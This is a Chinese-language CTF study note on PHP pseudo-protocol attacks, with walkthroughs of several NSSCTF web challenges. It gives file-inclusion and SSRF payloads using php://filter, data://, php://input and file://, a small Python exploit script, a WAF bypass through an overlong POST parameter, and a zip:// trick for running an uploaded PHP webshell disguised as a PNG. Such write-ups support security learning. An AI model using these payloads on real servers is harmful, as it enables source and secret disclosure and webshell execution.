Web入门-PHP伪协议

基础知识

zip伪协议

新建zip压缩文件并改名为xxxx.png,其中包含PHP一句话木马1.php,于是上传:

1
?fp=zip://uploads/xxxx.png%231

其中%23为井号,后面1会补全为1.php。

做题

[SWPUCTF 2021 新生赛]PseudoProtocols

hint.php读取方法:

1
?wllm=php://filter/read=convert.base64-encode/resource=hint.php

以文件形式读取:

1
?a=data://text/plain,I want flag

exp:

1
2
3
4
5
6
7
8
import requests,base64
response1=requests.get('http://node4.anna.nssctf.cn:28518/index.php?wllm=php://filter/read=convert.base64-encode/resource=hint.php')
tmp1=response1.text[-56:]
tmp2=base64.b64decode(tmp1.encode())
# print(tmp2)

response2=requests.get('http://node4.anna.nssctf.cn:28518/test2222222222222.php?a=data://text/plain,I want flag')
print(response2.text[-44:])

[NISACTF 2022]easyssrf

SSRF,尝试访问:

1
file:///flag

访问:

1
file:///fl4g

访问:

1
http://node5.anna.nssctf.cn:28734/ha1x1ux1u.php

php伪协议:

1
http://node5.anna.nssctf.cn:28734/ha1x1ux1u.php?file=php://filter/read=convert.base64-encode/resource=/flag

[SWPUCTF 2022 新生赛]ez_ez_php

看到include尝试伪协议:

1
http://node5.anna.nssctf.cn:28778/?file=php://filter/read/convert.base64-encode/resource=flag.php

Base64解码后,选择直接访问flag路由:

1
http://node5.anna.nssctf.cn:28778/flag

[鹏城杯 2022]简单包含

flag伪协议读取:

1
flag=php://filter/convert.base64-encode/resource=/var/www/html/flag.php

回显有waf…先读index.php看看源码:

1
flag=php://filter/convert.base64-encode/resource=index.php

绕过waf只需满足其中一个条件即可:要么不含flag,要么长度超过800。

构造一个超长的POST传参:

1
a=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&flag=php://filter/convert.base64-encode/resource=/var/www/html/flag.php

[HNCTF 2022 Week1]Interesting_include

1
http://node5.anna.nssctf.cn:28790/?filter=php://filter/read=convert.base64-encode/resource=flag.php

[GDOUCTF 2023]泄露的伪装

当遇到以下情况时,使用data:plain/text传入:

1
if(file_get_content($cxk)=="ctrl"){...}

payload:

1
http://node5.anna.nssctf.cn:28125/orzorz.php?cxk=data:plain/text,ctrl

另一种可行的:

1
2
3
4
GET:
?cxk=php://input
POST:
ctrl

[MoeCTF 2022]baby_file

1
http://node5.anna.nssctf.cn:28990/?file=php://filter/convert.base64-encode/resource=flag.php